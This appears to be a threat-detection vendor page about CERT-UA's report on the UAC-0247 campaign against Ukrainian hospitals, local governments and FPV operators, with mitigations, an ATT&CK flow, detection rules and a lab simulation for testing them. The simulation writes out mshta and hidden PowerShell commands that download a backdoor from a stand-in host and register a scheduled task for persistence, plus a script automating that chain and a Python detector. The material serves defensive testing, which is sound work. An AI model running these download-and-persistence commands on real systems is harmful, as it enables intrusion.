UAC-0247 Targets Hospitals, Local Governments, and FPV Operators
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Between March and April 2026, CERT-UA recorded a rise in cyberattacks against Ukrainian hospitals, municipal authorities, and FPV operator groups. The activity relies on phishing emails containing malicious HTA or HTML links that deliver custom loaders, the RAVENSHELL reverse shell, and the C#-based AGINGFLY remote access tool. Additional payloads include the SILENTLOOP PowerShell backdoor, the CHROMELEVATOR and ZAPIXDESK credential stealers, and the publicly available scanner RUSTSCAN. The attackers also use DLL sideloading, scheduled tasks, and a broad set of custom command-and-control infrastructure.
Investigation
CERT-UA reviewed dozens of incidents and extracted indicators of compromise, including malicious executables, scripts, scheduled tasks, IP addresses, and domains. The investigation uncovered a two-stage loader, a reverse TCP shell protected with XOR encryption, and a WebSocket-based C2 channel that relies on a static AES-CBC key. Analysts also documented the abuse of legitimate Windows utilities such as mshta.exe, powershell.exe, and wscript.exe to launch the malicious HTA files.
Mitigation
The report advises disabling the execution of LNK, HTA, and JavaScript files delivered through email, limiting the use of mshta.exe, powershell.exe, and wscript.exe, and enforcing application allow-listing. Defenders are also encouraged to monitor for suspicious scheduled task creation and outbound connections to the identified command-and-control servers.
Response
Security teams should promptly block the known malicious URLs and IP addresses, hunt for the listed file names and scheduled tasks across endpoints, and isolate compromised systems. Detection rules should be deployed for the observed command lines, with additional monitoring for AGINGFLY-related WebSocket traffic. Any accounts that may have been exposed should undergo immediate credential resets.
Attack Flow
graph TB
    %% Class definitions
    classDef technique fill:#ffcc99
    classDef tool fill:#c2c2f0
    classDef malware fill:#ff9999

    %% Node definitions
    initial_user_exec["<b>Technique</b> – <b>T1204.001 User Execution: Malicious Link</b><br/><b>Description</b>: User clicks a malicious link that triggers payload execution."]
    class initial_user_exec technique
    system_binary_mshta["<b>Technique</b> – <b>T1218.005 System Binary Proxy Execution: Mshta</b><br/><b>Description</b>: Use of mshta.exe to execute malicious code."]
    class system_binary_mshta technique
    powershell_interpreter["<b>Technique</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: PowerShell used for command and scripting execution."]
    class powershell_interpreter technique
    compression_obfusc["<b>Technique</b> – <b>T1027.015 Compression</b><br/><b>Description</b>: Compress files to hide malicious content."]
    class compression_obfusc technique
    process_hollowing["<b>Technique</b> – <b>T1055.012 Process Injection: Process Hollowing</b><br/><b>Description</b>: Replace code of a running process with malicious code."]
    class process_hollowing technique
    dll_sideload["<b>Technique</b> – <b>T1574.001 DLL Side-loading</b><br/><b>Description</b>: Load malicious DLLs via side-loading."]
    class dll_sideload technique
    appinit_dll["<b>Technique</b> – <b>T1546.010 AppInit DLLs</b><br/><b>Description</b>: Register malicious DLLs in AppInit_DLLs key for execution."]
    class appinit_dll technique
    agingfly_tool["<b>Tool</b> – <b>Name</b>: AGINGFLY<br/><b>Type</b>: Remote Access Tool"]
    class agingfly_tool tool
    websocket_c2["<b>Technique</b> – <b>T1071.001 WebSocket C2</b><br/><b>Description</b>: Use WebSocket protocol for command and control communications."]
    class websocket_c2 technique
    xmrig_malware["<b>Malware</b> – <b>Name</b>: XMRIG<br/><b>Purpose</b>: Cryptocurrency mining (compute hijacking)"]
    class xmrig_malware malware
    rustscan_tool["<b>Tool</b> – <b>Name</b>: Rustscan<br/><b>Function</b>: Network service discovery"]
    class rustscan_tool tool
    lateral_transfer["<b>Technique</b> – <b>T1570 Lateral Tool Transfer</b><br/><b>Description</b>: Transfer tools to remote systems for lateral movement."]
    class lateral_transfer technique
    ingress_transfer["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b><br/><b>Description</b>: Transfer tools/files into victim environment."]
    class ingress_transfer technique
    chromelevet_tool["<b>Tool</b> – <b>Name</b>: ChromeLevator<br/><b>Purpose</b>: Extract credentials from Chrome browsers"]
    class chromelevet_tool tool
    reflective_obfusc["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Use reflective loading and embedded payloads to hide malicious code."]
    class reflective_obfusc technique
    scheduled_tasks["<b>Technique</b> – <b>T1059.003 Windows Command Shell (Scheduled Tasks)</b><br/><b>Description</b>: Execute scheduled tasks via cmd shell."]
    class scheduled_tasks technique

    %% Connections
    initial_user_exec -->|leads_to| system_binary_mshta
    system_binary_mshta -->|executes| powershell_interpreter
    powershell_interpreter -->|obfuscates| compression_obfusc
    compression_obfusc -->|injects| process_hollowing
    process_hollowing -->|loads| dll_sideload
    dll_sideload -->|triggers| appinit_dll
    appinit_dll -->|installs| agingfly_tool
    agingfly_tool -->|communicates via| websocket_c2
    websocket_c2 -->|controls| xmrig_malware
    xmrig_malware -->|discovers network via| rustscan_tool
    rustscan_tool -->|enables| lateral_transfer
    lateral_transfer -->|facilitates| ingress_transfer
    ingress_transfer -->|steals| chromelevet_tool
    chromelevet_tool -->|enables| reflective_obfusc
    reflective_obfusc -->|schedules| scheduled_tasks
Detections
- Possible Malicious LNK File with Double Extension (via cmdline)
- Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
- Download or Upload via Powershell (via cmdline)
- Possible Execution by Use of Short Script Name (via cmdline)
- Short File Name (via cmdline)
- Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
- OneDrive Binary Executed From Unusual Directory (via process_creation)
- Unusual Extension of Executable Binary (via process_creation)
- LOLBAS WScript / CScript (via process_creation)
- Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
- LOLBAS Conhost (via cmdline)
- Possible Tunneling Tool Usage [Windows] (via cmdline)
- Suspicious CURL Usage (via cmdline)
- Possible Scheduled Task Creation (via powershell)
- Call Suspicious .NET Methods from Powershell (via powershell)
- Possible Telegram Abuse As Command And Control Channel (via dns_query)
- Suspicious Process DNS Query Known Abuse Web Services (via network_connection)
- Suspicious File Download Direct IP (via proxy)
- Suspicious Command and Control by Request to Out-of-Band Interactions Domain (via dns)
- Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
- IOCs (HashSha256) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 4
- IOCs (HashSha256) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 3
- IOCs (HashSha256) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 2
- IOCs (HashSha256) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 1
- IOCs (HashSha1) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247
- IOCs (HashMd5) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 4
- IOCs (HashMd5) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 3
- IOCs (HashMd5) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 2
- IOCs (HashMd5) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 1
- IOCs (SourceIP) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247
- IOCs (DestinationIP) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247
- Detection of Malicious Domain and C2 Communication by UAC-0247 [Windows Network Connection]
- Malicious Execution via Mshta and Powershell with Scheduled Tasks [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
An attacker has gained an initial foothold on a compromised workstation. To maintain persistence and execute further payloads while evading traditional AV, the attacker:
- Uses mshta.exe to download and execute a malicious HTA file that contains a PowerShell one-liner.
- The PowerShell one-liner downloads a backdoor binary from a remote server and stores it in %TEMP%.
- Creates a scheduled task (schtasks /Create /SC MINUTE /MO 10) that runs the backdoor every ten minutes, ensuring continual execution even after reboot.
The exact commands executed on the compromised host are:
:: Step 1 – mshta download & launch
mshta.exe "http://malicious.example.com/payload.hta"
:: Step 2 – PowerShell embedded in the HTA (simulated here directly)
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
  -Command "(New-Object System.Net.WebClient).DownloadFile('http://malicious.example.com/backdoor.exe',$env:TEMP+'\backdoor.exe')"
:: Step 3 – Scheduled task for persistence
schtasks /Create /SC MINUTE /MO 10 /TN "Updater" /TR "%TEMP%\backdoor.exe"
Regression Test Script: The following PowerShell script automates the entire attack chain, reproducing the exact telemetry required for the rule to fire.
#================================================================
# Regression Test – Trigger Sigma Rule for mshta + PowerShell + schtasks
#================================================================

# 1. Define URLs and paths (use benign test servers in a lab)
$htaUrl     = "http://127.0.0.1:8080/payload.hta"
$payloadUrl = "http://127.0.0.1:8080/backdoor.exe"
$tempPath   = "$env:TEMP\backdoor.exe"
$taskName   = "Updater"

# 2. Simulate mshta execution (downloads the HTA – here we just call mshta)
Write-Host "[*] Executing mshta.exe"
Start-Process -FilePath "mshta.exe" -ArgumentList "`"$htaUrl`"" -NoNewWindow -Wait

# 3. Execute PowerShell one-liner to fetch the backdoor
Write-Host "[*] Downloading backdoor via PowerShell"
$psCmd = "(New-Object System.Net.WebClient).DownloadFile('$payloadUrl','$tempPath')"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"$psCmd`"" -NoNewWindow -Wait

# 4. Create scheduled task (10-minute interval)
Write-Host "[*] Creating scheduled task for persistence"
$schtasksArgs = "/Create /SC MINUTE /MO 10 /TN `"$taskName`" /TR `"$tempPath`" /F"
Start-Process -FilePath "schtasks.exe" -ArgumentList $schtasksArgs -NoNewWindow -Wait

Write-Host "[+] Attack simulation completed. Check the SIEM for the alert."
Cleanup Commands: After validation, remove the created artifacts to restore the host to a clean state.
# Delete the scheduled task
schtasks /Delete /TN "Updater" /F
# Remove the backdoor binary
Remove-Item -Path "$env:TEMP\backdoor.exe" -Force
# (Optional) Delete any test HTA files if they were saved locally
# Remove-Item -Path "$env:TEMP\payload.hta" -Force
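To confirm that the telemetry produced by the simulation actually yields one correlated hit rather than three unrelated alerts, here is an added example that is not part of the original page or of the detection rule itself: a small Python detector that labels each process-creation event and then links the mshta, PowerShell and schtasks stages through parent pids. The event records, pids and the benign "Backup" task are constructed sample data, and the field names (pid, ppid, image, cmdline) are an assumption rather than any particular SIEM schema.

```python
import re

# Constructed sample events (not real telemetry) modelled on the page's mshta -> PowerShell -> schtasks chain.
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://malicious.example.com/payload.hta"'},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                 "\"(New-Object System.Net.WebClient).DownloadFile("
                 "'http://malicious.example.com/backdoor.exe',$env:TEMP+'\\backdoor.exe')\"")},
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /Create /SC MINUTE /MO 10 /TN "Updater" /TR "%TEMP%\\backdoor.exe"'},
    {"pid": 4, "ppid": 50, "image": r"C:\Windows\System32\schtasks.exe",  # benign admin task
     "cmdline": 'schtasks /Create /SC DAILY /TN "Backup" /TR "C:\\Program Files\\Backup\\run.exe"'},
]

URL_RE = re.compile(r"https?://", re.I)
BYPASS_RE = re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+bypass", re.I)
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
USER_WRITABLE_RE = re.compile(r"%TEMP%|\$env:TEMP|\\AppData\\Local\\Temp\\|\\Users\\Public\\|\\ProgramData\\", re.I)
ALL_STAGES = {"mshta_remote_hta", "powershell_bypass_download", "schtasks_user_writable_dir"}


def classify(event):
    """Return the detection labels that apply to one process-creation event."""
    image, cmd = event["image"].lower(), event["cmdline"]
    hits = []
    if image.endswith("\\mshta.exe") and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")            # T1218.005: mshta launching a remote HTA
    if image.endswith("\\powershell.exe") and BYPASS_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        hits.append("powershell_bypass_download")  # T1059.001 + T1105: download with policy bypass
    if image.endswith("\\schtasks.exe") and re.search(r"/create\b", cmd, re.I) and USER_WRITABLE_RE.search(cmd):
        hits.append("schtasks_user_writable_dir")  # persistence: task target in a user-writable path
    return hits


def find_chains(events):
    """From each schtasks hit, walk parent pids upward; report chains where all three stages fired."""
    by_pid = {e["pid"]: e for e in events}
    chains = []
    for ev in events:
        if "schtasks_user_writable_dir" not in classify(ev):
            continue
        labels, chain, cur = set(), [], ev
        while cur is not None and cur["pid"] not in chain:  # stop at the sample edge or on pid reuse
            labels.update(classify(cur))
            chain.append(cur["pid"])
            cur = by_pid.get(cur["ppid"])
        if ALL_STAGES <= labels:
            chains.append(chain)
    return chains
```

The benign "Backup" task never reaches the correlation step because its target sits under Program Files, which is the distinction the Schtasks rule on this page relies on.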